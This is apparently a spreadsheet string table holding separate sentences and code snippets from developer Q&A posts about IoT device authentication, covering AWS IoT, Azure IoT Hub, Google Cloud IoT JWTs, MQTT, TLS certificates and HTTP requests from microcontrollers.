    <t>Here's an excerpt from the docs page: https://cloud.google.com/iot/docs/how-tos/credentials/jwts
("Expiration"): The timestamp when the token stops being valid, specified as seconds since 00:00:00 UTC, January 1, 1970.</t>
  </si>
  <si>
    <t>You'll need to generate a unique secret and token pair for your master and client presentations.</t>
  </si>
  <si>
    <t>You use the client ID and one private key to create a signed JWT and construct an access-token request in the appropriate format.</t>
  </si>
  <si>
    <t>So in my IAM Policy I'd like to specify that only users whose Cognito ID is contained in the topic have Publish/Receive permissions for that topic.</t>
  </si>
  <si>
    <t>I've found this forum post (somehow similar to this blog post) which talks about a cipher suite problem on the server side and to force the client to use HTTP1/1, but since I'm using the SDK, I have no control on how the request is performed.</t>
  </si>
  <si>
    <t>I need to know how aws iot generates a certificate id so that I can dynamically subscribe to the MQTT topics.</t>
  </si>
  <si>
    <t>I have setup both an IAM role for the identity pool, and attached an IoT policy to the authenticated user (with the identity ID retrieved from Amplify).</t>
  </si>
  <si>
    <t>https://github.com/awslabs/aws-sdk-ios-samples/tree/master/IoT-Sample/Swift/IoTSampleSwift
In the sample project above, application generates its own certificate and key pair using AWSIoT SDK.</t>
  </si>
  <si>
    <t>Is it possible to push data to azure iot hub without an authorization header?</t>
  </si>
  <si>
    <t>In other words, I need my application to be allowed to publish on telemetry topics from several devices without having to handle the tokens/access of each device.</t>
  </si>
  <si>
    <t>That said, the connection between leaf device and edge Hub uses TLS + Authentication for security, if this is the concern.</t>
  </si>
  <si>
    <t>If this is not the case for your client environment, you can download and use the full certificate chain from messaging.pem
Refer to IoT TLS security requirements documentation 
Were you originally running the script to a non-SSL port?</t>
  </si>
  <si>
    <t>Per the Android Things platform overview docs:
Requesting Permissions at Runtime is not supported because embedded devices aren't guaranteed to have a UI to accept the runtime dialog.</t>
  </si>
  <si>
    <t>When we create a policy select "iot:" as Action part and "" as Resource ARN
Attach the thing and policy to certificate that was created
make sure the certificates are downloaded to path "/etc/mosquitto/certs"
make sure to give the topic names and QOS level that are to be bridged
give the correct AWS IOT endpoint in the conf file
log_type as all .</t>
  </si>
  <si>
    <t>pi@raspberrypi:~/aws-iot-device-sdk-js/examples $ vi device-example.js 
pi@raspberrypi:~/aws-iot-device-sdk-js/examples $ ls ~/certs/private.pem.key 
/home/pi/certs/private.pem.key</t>
  </si>
  <si>
    <t>I already read the following documentation and code:
https://cloud.google.com/iot/docs/how-tos/mqtt-bridge#iot-core-mqtt-auth-run-python
https://github.com/GoogleCloudPlatform/python-docs-samples/blob/master/iot/api-client/mqtt_example/cloudiot_mqtt_example.py</t>
  </si>
  <si>
    <t>I've been trying to set up an IOTEdge Device as transparent gateway to forward leaf-telemetry to IOTHub via IOTEdge.</t>
  </si>
  <si>
    <t>The most secure thing is to say, client1, client2, and client3 are authorized to talk to the server.</t>
  </si>
  <si>
    <t>The access to the resources exposed by your server is dictated by the CORS policy he defines in its response to your request.</t>
  </si>
  <si>
    <t>One important request is GetSystemDateAndTime - ONVIF clients query this since the timestamp is used in the authorization token.</t>
  </si>
  <si>
    <t>Now, you need to attach a policy to every cognito user(IoT's AttachPolicy call) to give specific permissions to the cognito user.</t>
  </si>
  <si>
    <t>Once the Event will be sent to Cloud IOT-HUB from Device thru Device
  Node.JS sdk, once message is received on IOT-Hub same needs to be
  acknowledged to nodejs.</t>
  </si>
  <si>
    <t>Official website of Transcrypt: http://www.transcrypt.org
GitHub repository: https://github.com/qquick/Transcrypt</t>
  </si>
  <si>
    <t>The db content permissions also seem fine:
$ ls -l /data/db_backup
total 131100
drwxr-xr-x 2 mongodb mongodb     4096 Aug 28 09:44 client-db
-rw------- 1 mongodb mongodb 16777216 Aug 28 09:44 client-db.0
-rw------- 1 mongodb mongodb 33554432 Aug 28 09:44 client-db.1
-rw------- 1 mongodb mongodb 16777216 Aug 28 09:44 client-db.ns
-rwxr-xr-x 1 mongodb mongodb        0 Aug 28 13:52 mongod.lock
drwxr-xr-x 2 mongodb mongodb     4096 Aug 28 09:44 myproject
-rw------- 1 mongodb mongodb 16777216 Aug 28 09:44 myproject.0
-rw------- 1 mongodb mongodb 33554432 Aug 28 09:44 myproject.1
-rw------- 1 mongodb mongodb 16777216 Aug 28 09:44 myproject.ns
I have also tried mongod --repair, but it does not help.</t>
  </si>
  <si>
    <t>I've tried this example:
https://github.com/awslabs/aws-iot-examples/tree/master/mqttSample 
And another one a little bit modfied so it can be used with Cognito Identity pool logged users.</t>
  </si>
  <si>
    <t>For this, I have gone through this document: 
https://docs.aws.amazon.com/iot/latest/apireference/API_CreateThing.html
I am having a problem with authorization.</t>
  </si>
  <si>
    <t>The Google Assistant can be authenticated with auth0 and with the webhook we can get the mqtt link from firebase to send the message to a particular ESP32.</t>
  </si>
  <si>
    <t>Edge Gateway, device1, device2 -&gt; Root Azure IoT Hub owner
Edge Gateway, Device 1 - IoT Hub 1
Edge Gateway, Device 2 - IoT Hub 2
so that relevant devices message can be forwarded to Hub1, Hub2.</t>
  </si>
  <si>
    <t>You are on the right way... if your Arduino libs are working then you can pub topics and see if the broker can deal with it (I suggest to use mqttFx as a client and subs to those topics too)
I saw that on some code examples, there were 'mqtt_password' and
  'mqtt_user' fields.</t>
  </si>
  <si>
    <t>The article Create an IoT Edge device that acts as a transparent gateway - preview does work fine.</t>
  </si>
  <si>
    <t>If you're seeing very frequent disconnects, it can often mean that you're inadvertently performing clientId stealing (i.e., two MQTT clients are fighting over the same clientId).</t>
  </si>
  <si>
    <t>The broker uses the ClientID to identify
  the client and the current state of the client.Therefore, this ID
  should be unique per client and broker.</t>
  </si>
  <si>
    <t>Try 
you can see the details of the same in the example in the following link
https://docs.microsoft.com/en-us/cli/azure/ext/azure-cli-iot-ext/iot/hub?view=azure-cli-latest#ext-azure-cli-iot-ext-az-iot-hub-generate-sas-token</t>
  </si>
  <si>
    <t>https://github.com/OhadR/oAuth2-sample/tree/master/authentication-flows
client application: 
https://github.com/OhadR/Authentication-Flows
Demo: http://auth-flows-demo.appspot.com/</t>
  </si>
  <si>
    <t>Accept.js is a module of the Authorize.Net Accept suite of tools.</t>
  </si>
  <si>
    <t>I've tried using Fiddler and, I assume because of the way it proxies traffic, it seems to work a little bit further, except my web service rejects the request as Forbidden (presumably because Fiddler is not including the correct client cert in the request).</t>
  </si>
  <si>
    <t>Result of verification is:
In function 'void loop()':
button_check_yapp:24: error: 'http' was not declared in this scope
       http.get("http://192.168.1.128/");
       ^
exit status 1
'http' was not declared in this scope
What's wrong?</t>
  </si>
  <si>
    <t>So then I sent it through ESP8266:
client.setNoDelay(true);
client.println("POST /api/mes HTTP/1.1");
client.println("Host: testserver.com");
client.println("Cache-Control: no-cache");
client.println("Postman-Token: 9b910ed2-afdc-2a11-4963-2f85626cfa4e");
client.println("Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW");
client.println("");
client.println("------WebKitFormBoundary7MA4YWxkTrZu0gW");
client.println("Content-Disposition: form-data; name=\"auth_key\"");
client.println("");
client.println("79bde0ff1efeaee90b1e432c08d324ecfdb532ac42406d7a9a87dd911e95f87e");
client.println("------WebKitFormBoundary7MA4YWxkTrZu0gW");
client.println("Content-Disposition: form-data; name=\"data\"");
client.println("");
client.println("[{\"key\":\"humidity\", \"value\":55}]");
client.println("------WebKitFormBoundary7MA4YWxkTrZu0gW--");
But unfortunately server is returning that the request is not correct.</t>
  </si>
  <si>
    <t>https://azure.microsoft.com/en-in/services/iot-hub/
From the documentation:
Connect, monitor and manage billions of IoT assetsUse Azure IoT Hub to securely connect, monitor and manage billions of devices to develop Internet of Things (IoT) applications.</t>
  </si>
  <si>
    <t>Haven't worked with Ardino but
have you turned off the firewall on the Win7 computer running the broker it is probably rejecting port 1883.
https://github.com/francoisvdm/TT3 is a good mqtt client for testing that the broker works from another windows computer.</t>
  </si>
  <si>
    <t>This recipe talks in detail about how to register a device in Watson IoT Platform - https://developer.ibm.com/recipes/tutorials/how-to-register-devices-in-ibm-iot-foundation/
This Java sample shows how one can do bulk addition/deletion - https://github.com/ibm-messaging/iot-platform-apiv2-samples/blob/master/java/api-samples-v2/README.md</t>
  </si>
  <si>
    <t>For information about how to do this using the different protocols that IoT Hub supports for device connections, please take a look at: https://azure.microsoft.com/documentation/articles/iot-hub-devguide/#security
If there is no way for your device to add authorization headers, you should consider using a field gateway that sits between your devices and your hub.</t>
  </si>
  <si>
    <t>By proving ownership of a signing cert in the chain (doesn't have to be the root, just one of the intermediates), you're proving that you have permission to generate leaf certificates for the devices that will be registering as a part of that enrollment group.</t>
  </si>
  <si>
    <t>Alternatively(For Send notification without device token to everyone) You can use "Topic" 
Make every user subscribe to topic in your android app using 
FirebaseMessaging.getInstance.subscribeToTopic("")
Now using FCM library code send notification to those who subscribed to your topics.</t>
  </si>
  <si>
    <t>https://www.thethingsnetwork.org/forum/t/limitations-data-rate-packet-size-30-seconds-uplink-and-10-messages-downlink-per-day-fair-access-policy/1300
You definitively cannot have more than 255 bytes in a message including header bytes.</t>
  </si>
  <si>
    <t>The relevant section of the HTTP protocol:
http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
More information about codes returned from IIS 7:
http://support.microsoft.com/kb/943891</t>
  </si>
  <si>
    <t>You can see what exactly the curl command sends and receives, if you run it the -v or --verbose option:
curl --header 'Access-Token: &lt;your_access_token_here&gt;' \
     --data-urlencode active="true" \
     --data-urlencode modified_after="1.4e+09" \
     --get -v\
     https://api.pushbullet.com/v2/pushes
With this you would see:
* ... TLS stuff ...
&gt; GET /v2/pushes?active=true&amp;modified_after=1.4e%2B09 HTTP/1.1
&gt; Host: api.pushbullet.com
&gt; User-Agent: curl/7.42.1
&gt; Accept: */*
&gt; Access-Token: &lt;your_access_token_here&gt;
&gt;
&lt; ...</t>
  </si>
  <si>
    <t>In my project, I changed constants in  in order to access MQTT service of my client, as following:
But when I press Connect, the app throws this error:
2018-06-04 17:12:59:992 IoTSampleSwift[4999:2464150] Response body:
  {"__type":"InvalidIdentityPoolConfigurationException","message":"Invalid identity pool configuration.</t>
  </si>
  <si>
    <t>Exception in thread "main" com.microsoft.azure.storage.StorageException: Server failed to authenticate the request.</t>
  </si>
  <si>
    <t>http://176.32.230.47/noticeboard.com/php/index.php
customer enters login, password, it all looks ok
http://176.32.230.47/ generates a session cookie, and redirects to http://192.168.0.5?secret=abcdefgh
http://192.168.0.5 gets a HTTP request, and extracts the secret
http://192.168.0.5 validates the secret by calling a new service http://176.32.230.47/validate?secret=abcdefgh
if the validation returns ok, 192.168.0.5 returns the page.</t>
  </si>
  <si>
    <t>(I have created this certificate through AWS resource)
I have followed the exact same steps as mentioned in the link:
https://github.com/awslabs/aws-sdk-android-samples/tree/master/AndroidPubSub
Here is my code:</t>
  </si>
  <si>
    <t>Setting a super-short timeout on the server will help, as would keeping the data to be posted until you have confirmation that it has been saved - and creating unique IDs in the client to ensure that the request is idempotent.</t>
  </si>
  <si>
    <t>I'm looking for a way to Create and provision a simulated x509 certificate Edge device on Windows in c#.</t>
  </si>
  <si>
    <t>They might also use the time in the request to generate the expiration date on the certificate.</t>
  </si>
  <si>
    <t>Function node:
I send it to a http request node with a POST to
Basic Authentication with api keys.</t>
  </si>
  <si>
    <t>It is configured as follows:
Certs are generated by generate-CA.sh from https://github.com/owntracks/tools/tree/master/TLS with SHA256 (I tried also MD5).</t>
  </si>
  <si>
    <t>Then I'm attaching a previously created iot policy to that identity.</t>
  </si>
  <si>
    <t>Download the IoT Console generated private key and client cert as well as the CA Root cert from here.</t>
  </si>
  <si>
    <t>Downstream leaf devices connect to a module gateway and present their credentials.</t>
  </si>
  <si>
    <t>You can actually find a C service client SDK in the C SDK repo under the folder "service" if you want to develop a back-end or management application in C.
Now, all that said, what it seems you are actually looking for is for a secure auto-registration mechanism, which is something we don't have yet on Azure IoT Hub.</t>
  </si>
  <si>
    <t>A csrf-token is a secret value added to a web form by the server and sent back by the user as part of a POST request, used to prevent cross-site request forgeries by making sure that the user sending the POST request has actually loaded the form.</t>
  </si>
  <si>
    <t>In either case, you should protect that flow by requiring that it take place over HTTPS (as opposed to plain-text HTTP) and authenticating the client using either a TLS client certificate or some sort of API key.</t>
  </si>
  <si>
    <t>Also the documentation says: "Identity translation - Devices that cannot connect to IoT Hub can connect to a gateway device.."
This means that in Identity translation case your downstream device is not visible to IoT Hub, therefore also to DPS but it is potentially in the same network as your IoT Edge appliance.</t>
  </si>
  <si>
    <t>",
        "SecureConnection": false,
        "Time": "2016-02-14T18:32:19.397Z",
        "User": "use-token-auth",
        "WriteBytes": 4,
        "WriteMsg": 0
    },
    "topic": "iot-2/type/nodeMCU/id/InterConnect/mon"
}
I'm wondering how my topic got changed to what it's showing here.</t>
  </si>
  <si>
    <t>I am following https://docs.microsoft.com/en-us/azure/iot-hub/iot-hub-bulk-identity-mgmt to do Bulk upload of Device Identities in Azure IoT Hub.</t>
  </si>
  <si>
    <t>That's all different if you're using IoT Hub Provisioning Service though, as that will do chain validation, and the device cert must reside on a TPM.</t>
  </si>
  <si>
    <t>Can't connect to Losant MESSAGE: mqttClient.state -1
I made a code to my WEMOS D1 Controller and ths code should be send data (temp, humidity) to Losant, Connecting to WiFi is ok, but when the Controller connecting to Losant is a message:
My code:
In Logs in Losant website I have only message:
Device RoomSensor1 authenticated with Losant Authentication succeeded ndz 16 gru 2018 21:45:41 GMT+01:00
The Controller had a connection/authentication succeeded, but next process is won't be gone.</t>
  </si>
  <si>
    <t>As far as security is concerned it has nothing to do with the policy variables in a policy, its ultimately what action policy allows or denies as policy variables gets resolved on the fly depending upon who is trying to do the operation and there after it is same as your hardcoded policy.</t>
  </si>
  <si>
    <t>Device Provisioning Service is a helper service for IoT Hub that
  enables zero-touch, just-in-time provisioning to the right IoT hub
  without requiring human intervention, allowing customers to provision
  millions of devices in a secure and scalable manner.</t>
  </si>
  <si>
    <t>From the documentation, the special domain "mqtt.2030.ltsapis.goog" can be used instead of "mqtt.googleapis.com" allowing the need of only two root CA certs w/ small ECC 256 public keys instead of the entire root.pem package (128KB).</t>
  </si>
  <si>
    <t>ESP8266:
If I do not send "Content-Encoding: gzip", then the gzipped content is served, but shown as garbled text offcourse.</t>
  </si>
  <si>
    <t>When I took a look at the broker console it stated that the channel is established with the device, so I concluded that messages were normally transmitted from the device to the broker, and from the broker to the analytics server receiver.</t>
  </si>
  <si>
    <t>Error Message :
Response code: 403
{"message":"The request signature we calculated does not match the signature you provided.</t>
  </si>
  <si>
    <t>When I try to perform same connection using auth-token it goes through fine
I am also able to successfully connect using certs through another client.</t>
  </si>
  <si>
    <t>First, client get an authentication token from first API, and then send a request with that token to second API to do some operations.</t>
  </si>
  <si>
    <t>I have seen this WiFiClientSecure library and the example for an HTTPS request, but can't find any examples that make an https request over Ethernet.</t>
  </si>
  <si>
    <t>You have to catch the cookies from the authentication request and send them back in the header of the second HTTP request (the GET one).</t>
  </si>
  <si>
    <t>client.println("POST " + url + " HTTP/1.1")-&gt;client.println("POST " + url + + Postdata +" HTTP/1.1");
Finally i had to change from using WifiClient to WiFiClientSecure.</t>
  </si>
  <si>
    <t>There is some difficulties to get cryptography working on some system (https://github.com/Azure/azure-storage-python/issues/219)</t>
  </si>
  <si>
    <t>When a malformed message is received by the IoT hub, the message is actually removed from the queue.</t>
  </si>
  <si>
    <t>The fact that two have problems where one does not suggests a client ID collision: every MQTT client device must have a different client ID.</t>
  </si>
  <si>
    <t>So this PayTM Tag can be used for Authentication, Configuration, Gateway issues, Request and Response related to PayTM Payment Gateway.</t>
  </si>
  <si>
    <t>The proxying is performed by hostname, so you must use the same SSL certificates for a given hostname independently of its paths.</t>
  </si>
  <si>
    <t>Digest authentication is a challenge-response authentication mechanism for HTTP that protects a client's username and password using one-way hashes with nonces.</t>
  </si>
  <si>
    <t>We are referring https://github.com/ibm-watson-iot/iot-csharp/blob/master/docs/CACertificate.md, however, we heard that .NET 4.5 is the only supported version for now.</t>
  </si>
  <si>
    <t>This SF Service needs to interact with 10,000 devices registered in Azure IoT Hub via it's AMQP 1.0 SSL TLS endpoints.</t>
  </si>
  <si>
    <t>From the link I've added you can see this HTTP POST packet example:
If you want to do this POST you should do something like:
mySerial.print("AT+QHTTPPOST=37,60,7\r");
CONNECT
mySerial.print("User=Peter+Lee&amp;pw=123456&amp;action=login");
And then read the response or something.</t>
  </si>
  <si>
    <t>The simplest and most secure way to authenticate your IoT devices with Google Cloud is using Cloud IoT Core to publish data over MQTT or HTTP into Cloud Pub/Sub.</t>
  </si>
  <si>
    <t>Azure IoT Edge can be used to satisfy all needs for an IoT gateway regardless of whether they are related to connectivity, identity, or edge analytics. "</t>
  </si>
  <si>
    <t>So you can use Public/Private Key pair to authorize and connect to the broker and use MQTT ClientID to differ between your devices.</t>
  </si>
  <si>
    <t>JSSE is a Java implementation of Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols.</t>
  </si>
  <si>
    <t>From https://stripe.com/docs/connect:
Stripe Connect is for accepting money on behalf of others, and gaining
  access to their data.</t>
  </si>
  <si>
    <t>This allows a client application to request that the Kerberized service authenticate an account even if the client does not know the actual account name.</t>
  </si>
  <si>
    <t>It is a Java implementation of Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols.</t>
  </si>
  <si>
    <t>I was able to find APIs to create/register devices and send/receive messages but wasn't able find APIs to CRUD Azure IoT hub.</t>
  </si>
  <si>
    <t>From the samples related to How to manage device enrollments with Azure Device Provisioning Service SDKs:
Bulk Individual Enrollments
Create Enrollment Group
Update
Take a look at the device samples.</t>
  </si>
  <si>
    <t>Using your own CA is meaned for mass production, otheway you could use the AWS SDK to create certs with AWS' rootCA.</t>
  </si>
  <si>
    <t>This mechanism allows these servers to create access tokens, and they will provide these tokens to their clients.</t>
  </si>
  <si>
    <t>The client reissues the original request with a WWW-Authenticate: Negotiate [gssapi-data] header.</t>
  </si>
  <si>
    <t>An Android class that is attached to a Webkit Webview to intercept load requests, key events, and other events.</t>
  </si>
  <si>
    <t>I think this is because the MQTT broker running at mqtt.googleapis.com cannot be accessed via a private network unless it is also proxied like the HTTP proxy solution described above.</t>
  </si>
  <si>
    <t>Clients therefore provide a list of desired Scopes when obtaining a Token (alongside standard OAuth ClientId and Client Authentication details).</t>
  </si>
  <si>
    <t>Then for testing purpose I created another API (API number 2), I replicated API number 1 entirely, created an authorizer with the same pool, enabled Authorization, logged in, got the id token used it in POSTMAN with Authorization header (the same process) and it didn't work.</t>
  </si>
  <si>
    <t>Features:
International Domains and URLs
Keep-Alive &amp; Connection Pooling
Sessions with Cookie Persistence
Browser-style SSL Verification
Automatic Content Decoding
Basic/Digest Authentication
Elegant Key/Value Cookies
Automatic Decompression
Unicode Response Bodies
Multipart File Uploads
Streaming Downloads
Connection Timeouts
 support
Chunked Requests
Python 2.63.7
Thread-safe.</t>
  </si>
  <si>
    <t>I created an AWS IoT thing, certificate and a policy then attach policy and thing with certificate.</t>
  </si>
  <si>
    <t>These are the Node-RED error messages:
I then created a device on the Watson IoT platform using the mydevicetype and mydevicedid and eas provided a token.</t>
  </si>
  <si>
    <t>I am trying to create a new device identity in the identity registry in my Azure IoT Hub.</t>
  </si>
  <si>
    <t>You may have to use certificate for https intercept/transparent mode, create a certificate and tell squid to bump a dummy domain.</t>
  </si>
  <si>
    <t>var provisioningHost = '{your provisioning Host}';
  var idScope = '{your id scope}';
  var registrationId = 'device01';
  var deviceCert = {
   cert: fs.readFileSync('device01_cert.pem').toString(),
   key: fs.readFileSync('device01_key.pem').toString()
  };
At last, run node register_x509.js to assign the device.</t>
  </si>
  <si>
    <t>You can also use IoT policies attached to thing certificates to enforce that a thing is only publishing on the topics it should.</t>
  </si>
  <si>
    <t>Update:
When debugging the code, I see that the BluetoothLEDevice's DeviceAccessInformation property throws the exception and it gets propagated to the top level: 
DeviceAccessInformation = 'device.DeviceAccessInformation' threw an
  exception of type 'System.InvalidCastException'
Update2
When I try accessing GATT services directly this way, I get a different exception:
BluetoothLEDevice device = await BluetoothLEDevice.FromBluetoothAddressAsync(eventArgs.BluetoothAddress);
            var gattService = await GattDeviceService.FromIdAsync(device.DeviceId);
The exception in this case is
System.IO.FileNotFoundException: The system cannot find the file
  specified.</t>
  </si>
  <si>
    <t>I found this error: 
Token auth failed (Device/gateway not found in database): ClientID='d:4rxa4d:AndroidDevice:1c39476b8dd0' 
Have you created a device type for AndroidDevice and registered the ID 1c39476b8dd0 to your org in the Watson IoT Platform?</t>
  </si>
  <si>
    <t>CurrentPlatform.Init();
            var client = new MobileServiceClient("THE URL");
            var authenticationResult = await ServicePrincipal.GetS2SAccessTokenForProdMSA();
            JObject payload = new JObject();
            payload["access_token"] = authenticationResult.AccessToken;
            await client.LoginAsync(MobileServiceAuthenticationProvider.WindowsAzureActiveDirectory, payload);
Can you see any issues here, how do i pass though the authorization token?</t>
  </si>
  <si>
    <t>Instead of SDK am directly calling azure iot provisioning rest api to enroll device and then register it.</t>
  </si>
  <si>
    <t>To circumvent this i installed a local Mosquitto Broker which accepts unsecured messages in my Raspberry Pi and shall bridge them to the Google IoT Core Broker.</t>
  </si>
  <si>
    <t>Copy the contents on both servers of
and append (create new if it does not exist) to the file
/root/.ssh/authorized_keys
on the opposite system, so openelecs id_rsa.pub goes to authorized keys on the server and vice versa.</t>
  </si>
  <si>
    <t>No additional device driver is installed, the FT232R USB UART is correctly recognized,
For code samples using serial ports, refer to https://github.com/ms-iot/samples/tree/develop/SerialSample.</t>
  </si>
  <si>
    <t>Requesting Permissions at Runtime is not supported because embedded devices aren't guaranteed to have a UI to accept the runtime dialog.</t>
  </si>
  <si>
    <t>From here you can start to install Jupyter:
http://jupyter.org/install
You can open up the HTTP port for Jupyter on your Pi and access it over your local network, or you can tunnel in over SSH using something like:
The way I prefer is to install jupyterhub:
https://github.com/jupyterhub/jupyterhub
This is mostly straightforward, the one catch is that you will want to secure the connection with SSL, which probably means a self-signed certificate with something like:
The problem is that Safari chokes on self-signed certs.</t>
  </si>
  <si>
    <t>It is useful for accessing web sites that require small pieces of data  cookies  to be set on the client machine by an HTTP response from a web server, and then returned to the server in later HTTP requests.</t>
  </si>
  <si>
    <t>M2Crypto is the most complete Python wrapper for OpenSSL featuring RSA, DSA, DH, HMACs, message digests, symmetric ciphers (including AES); SSL functionality to implement clients and servers; HTTPS extensions to Python's httplib, urllib, and xmlrpclib; unforgeable HMAC'ing AuthCookies for web session management; FTP/TLS client and server; S/MIME; ZServerSSL.</t>
  </si>
  <si>
    <t>Advantages over Javascript requests:
Background threading - all requests are done in a background thread
SSL Pinning
https://ionicframework.com/docs/native/http/</t>
  </si>
  <si>
    <t>// above code can be used for publishing data to client
3.For subscribing create a new MQTT client do all the general settings(keep 
alive, timeout, encryption, username, password) and finally set callback and 
implement MQTT callback to get the overriding functions.</t>
  </si>
  <si>
    <t>When sending data I get an error:
Response to preflight request doesn't pass access control check: No 'Access-Control-Allow-Origin' header is present on the requested resource
I tried like this:
but the error was repeating so I tried to do this, with the same error:
Any ideas what I need to do?</t>
  </si>
  <si>
    <t>I can also see from the Azure Device SDK code that it uses some kind of logging (EventSource) but this is never enabled in the code:
Can you point me to some way where I can 1) actually enable logging in the Azure Device SDK and 2) find the content that was actually logged?</t>
  </si>
  <si>
    <t>Executing the exact same request with this method works just fine:
curl -X POST -H 'authorization: Bearer GW_JWT_TOKEN' -H 'content-type: application/json' --data '{"binary_data": "ewogICJhUHJvcCI6ICJhVmFsdWUiCn0=", "gateway_info": {"delegated_device_id": "gw_device_1"}}' -H 'cache-control: no-cache' 'https://cloudiotdevice.googleapis.com/v1/projects/my_project_id/locations/europe-west1/registries/my_registry/devices/my_first_gateway:publishEvent'
Am I missing something?</t>
  </si>
  <si>
    <t>I am trying send POST request for authentication and after it i want to send GET request for getting json, but i can't do it, because it gives me en error 401 unauthorized (cookies doesn't saved) .</t>
  </si>
  <si>
    <t>If the simulated device is connecting to IoT Hub using HTTPS, it checks for cloud-to-device messages when it starts up, and then polls for cloud-to-device messages.</t>
  </si>
  <si>
    <t>Make your router accept HTTP requests , and run a HTTP to CoAP proxy in your system, access your CoAP devices via your IP thought HTTP-CoAP proxy.</t>
  </si>
  <si>
    <t>In the  command you're actually using x.509 certificate approach (you can see here for further information: https://docs.aws.amazon.com/iot/latest/developerguide/managing-device-certs.html) This doesn't need the payload to be signed, it's already trusted because the certificate is.</t>
  </si>
  <si>
    <t>If a server receives a request for a protected resource it responds with status  and a WWW-Authenticate: Negotiate header.</t>
  </si>
  <si>
    <t>I don't even have to modify the code anymore than setting the right SSID and password, and setting a CORS: * header in the HTTP response.</t>
  </si>
  <si>
    <t>I needed to add Https access to it, so I got a SSL certificate and I followed the steps and instead of having an https domain name, I got this error, 
Ive tried to undo everything from the SSL certificate initializing steps, but I still get this error.</t>
  </si>
  <si>
    <t>im getting this error when running my code:
Exception thrown: 'System.UnauthorizedAccessException' in mscorlib.ni.dll
WinRT information: Access Denied
Exception is thrown when this line is arrived:
await recog.ContinuousRecognitionSession.StartAsync();
Any help would be appreciated.</t>
  </si>
  <si>
    <t>I have an ASP.NET Core website in the Azure Cloud which can send messages to a simulated IoT device (console app) that sits on my private network.</t>
  </si>
  <si>
    <t>My command is:
curl -X POST -H 'authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJzeWx2YW4tam91cm5leS0xOTU4MTUiLCJleHAiOiIxNTIwMzU4NjMyIiwiaWF0IjoiMTUxOTc1MzgzMiJ9.kDkwtWvfAE+AOYT2cObgh8Mux2n1DOuek1KR0YrsFSI=' -H 'content-type: application/json' --data '{"binary_data": "SGVsbG8="}' -H 'cache-control: no-cache' 'https://cloudiotdevice.googleapis.com/v1/projects/sylvan-journey-195815/locations/europe-west1/registries/MyDeviceRegistry/devices/FirstDevice:publishEvent'
When I try to post the command I get error 401 "Request is missing required authentication credential.</t>
  </si>
  <si>
    <t>It should still work using the general socket library, I think, and does still work for an unsecured plain HTTP post, so I'd like to get something working right now with minimal changes.</t>
  </si>
  <si>
    <t>We have the following architecture configured:
IoT Hub consumes telemetry from devices;
Devices do not send their ID in the telemetry data.</t>
  </si>
  <si>
    <t>However since authenticated users all have the same policy, how can I edit policies on a per user basis to only allow their cognito identity to access particular user specific resources i.e.</t>
  </si>
  <si>
    <t>I have taken bulk import code from github msdn link 
but using this same code in console and in web application it is unable to register any new devices into iot hub.</t>
  </si>
  <si>
    <t>In short, try to use the following code to receive cloud-to-device messages from IoT Hub:
Here  is the instance of Microsoft.Azure.Devices.Client.DeviceClient which you create like this:
deviceClient = DeviceClient.Create(iotHubUri, 
  newDeviceAuthenticationWithRegistrySymmetricKey("myFirstDevice", deviceKey));</t>
  </si>
  <si>
    <t>Note, that the emulated device is using a Https protocol (connection less) and Azure IoT Hub Authorization.</t>
  </si>
  <si>
    <t>I guess that API service requires POST content and body to be application/x-www-form-urlencoded encoded.</t>
  </si>
  <si>
    <t>Here is an example of a basic communication between client and server:
Client asks server to authenticate the user, server stores the user
and returns a session id to the client.</t>
  </si>
  <si>
    <t>A concept in HTTP/1.1 content negotiation to indicate encryption or compression of an HTTP response (such as gzip support).</t>
  </si>
  <si>
    <t>Map&lt;String, String&gt; messages = new HashMap&lt;String, String&gt;();
        request.setAttribute("messages", messages);
        // Get and validate name.</t>
  </si>
  <si>
    <t>And then two problems may arise:
If I perform a mqtt.client:close() to assure that the client is closed (to avoid the second problem) and the client is already closed, the node resets.</t>
  </si>
  <si>
    <t>Claims to Windows Token Service is a feature of Windows Identity Foundation (WIF) that extracts UPN claims from non-Windows security tokens, such as SAML and X.509 tokens, and generates impersonation-level Windows security tokens.</t>
  </si>
  <si>
    <t>If I see the "code" generated by Postman in the succesfull post I have this:
POST /.json?auth=XXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1
Host: XXXXXXXXXXXXXXX-461a8.firebaseio.com
Content-Type: application/json
Cache-Control: no-cache Postman-Token: 2f95151e-52e1-28e7-9583-c0a8f50f77d7
{ "param1":"7" }
That's what I have tried to send to GPRS Module and I receive HTTP Error 400 bad request, how I have told at the beginning.</t>
  </si>
  <si>
    <t>Detailed error:
oauth2client.client.HttpAccessTokenRefreshError: invalid_grant: Invalid JWT: Token must be a short-lived token (60 minutes) and in a reasonable timeframe.</t>
  </si>
  <si>
    <t>However for authenticated cognito identities two things are required:
The "Identity pool authenticated" role must allow access to the IoT actions you require (e.g.</t>
  </si>
  <si>
    <t>2: an attacker could maybe DoS-attack you by requesting one-time-tokens until you run out of ram or whatever, preventing legitimate clients from generating tokens, but given the token lifetime of 1 second, it would have to be a continuous active attack, and stop working once the attacker is blocked/removed.</t>
  </si>
  <si>
    <t>I've previously generated the certificate :
tls.cert.verify([[
-----BEGIN CERTIFICATE-----
foo blah blah blah here is the certificate generated
-----END CERTIFICATE-----
]])
tls.cert.verify(true)
So now when my code calls tls.cert.verify(true) this certificate should already be stored in flash.</t>
  </si>
  <si>
    <t>Also there is one official solution at the page https://docs.wso2.com/display/IoTS300/Changing+the+Super+Administrator+Password : Changing the password via the device management console .</t>
  </si>
  <si>
    <t>The proxy services allows easy switching of transport, interface (WSDL/Schema/Policy), message format (SOAP 1.1, 1.2/POX/REST, Text, and Binary/Hessian), QoS (WS-Addressing, WS-Security, and WS-Reliable Messaging) and message optimization (MTOM/SwA).</t>
  </si>
  <si>
    <t>This allows WC data to be created, read, updated, and deleted using requests in JSON format and using WordPress REST API Authentication methods and standard HTTP verbs which are understood by most HTTP clients.</t>
  </si>
  <si>
    <t>Wifi captive portals (etc) typically ignore HTTPS requests, and wait for the first insecure HTTP request.</t>
  </si>
  <si>
    <t>server FQDN or YOUR name) []:localhost
/certs $ openssl x509 -req -in dev-csr.pem -signkey dev-key.pem -out dev-cert.pem
